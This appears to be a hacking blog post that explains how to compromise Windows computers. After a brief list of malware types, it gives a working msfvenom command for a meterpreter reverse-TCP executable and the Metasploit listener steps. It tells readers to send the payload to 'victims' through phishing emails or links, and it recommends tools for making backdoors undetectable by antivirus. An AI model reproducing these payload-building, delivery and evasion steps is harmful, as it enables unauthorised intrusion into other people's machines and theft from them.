Subscribe Us

How to Hack windows 7/8/10/11 | How to Hack computer.

 There are many methods to hack windows but one of the method is to send the malware, Trojan, backdoor or botnet to your victim via your social engineering techniques i.e. send the payload through email or via a link. When your victims run your Trojan or malware you will get reverse shell/tcp depends on your payload type.




 

What is Malware?

       Malware is a piece of malicious code or executable that hacker use to gain access to the systems of his victim. Malware is usually found in emails, fraud links pretending to give you job offer and many other techniques.

 

Types of Malwares: -

1)                Trojan

2)                Adware

3)                Fileless Malware

4)                Viruses

5)                Worms

6)                Botnets

7)                Ransomware

8)                Spyware

 

Trojans: -

     Trojan is a type of malware pretending to be a legitimate software but in fact in would be malicious. A Hacker usually bind Trojan Malwares with legit software and send to his victims. Hacker can send you Trojans in antivirus software and any application that hacker would trap you in his net.

 

Adware: -

     Adware commonly called “Spam” because it shows you a lot of advertisements in your pc and the ads link can be malicious.

 

Fileless Malware: -

     As common Malwares uses executable files to infect Devices. But Fileless malwares do not infect your system directly, these types of malwares are found in Microsoft office’s Macros which in-directly infect your PC.

 

Viruses: -

   Virus is the type of malware that infect other programs or applications and can spread in the network. It corrupt, delete or move your data.

 

Worms: -

     Like Viruses, Worms can duplicate themselves too and spread in the devices. Worms do not need human action to spread once they are in a network or system.

 

Botnets: -

     A bot is a software program that performs an automated task without requiring any interaction. Bots can execute attacks much faster than humans ever could. Bots can spread there bots in the Network if one device got infected. Bots spread in devices and make there own botnet network which will help the attacker in DDOS and Brute force attacks.

 

Ransomware: -

     Ransomware Malwares encrypt all Data in the device and hold for ransom. The Attacker warns his victim to pay the ransom on time before he deletes the data or sell in the Dark web.

 

Spyware: -

   Black Hat Hackers use Spyware to monitor the activities in their victims. Spywares are usually used in credential thefts like username, passwords or credit card numbers. Common type of Spyware is Key Logger.

 

Some of the famous tools for payload creation are as under;

1)    Metasploit

2)    FatRat

3)    Veil evasion

 

Metasploit: -

   Metasploit is an open source malware creating tools that helps the pentesters to test their Network’s security.

To hack windows use this command in metasploit

 msfvenom -p windows/meterpreter/reverse_tcp lhost=(yourIP) 10.0.2.15 lport=(yourport)4444 -f exe -o payload.exe

Open new terminal and type the following commands

è  Msfconsole 

è  use multi/handler

è  set payload windows/meterpreter/reverse_tcp

è  set lhost 10.0.2.15 (yourIP)

è  set lport 4444 (yourport)

è  exploit

After this send the payload to your victims, on execution you will get reverse tcp connection.

FatRat: -

       FatRat is one of the famous tools for pentesters. Fatrat comes with a lot of features like Undetectable backdoor for Windows and Android. You can download the FatRat from GitHub and type help you will get all details.

 

Veil evasion: -

       Veil evasion is a famous tool used to encrypt or make metasploit backdoors undetectable. Sometime metasploit backdoor are detected by antivirus so veil evasion solve this problem for hackers and make metasploit backdoor undetectable and can easily bypass antiviruses.

Post a Comment

0 Comments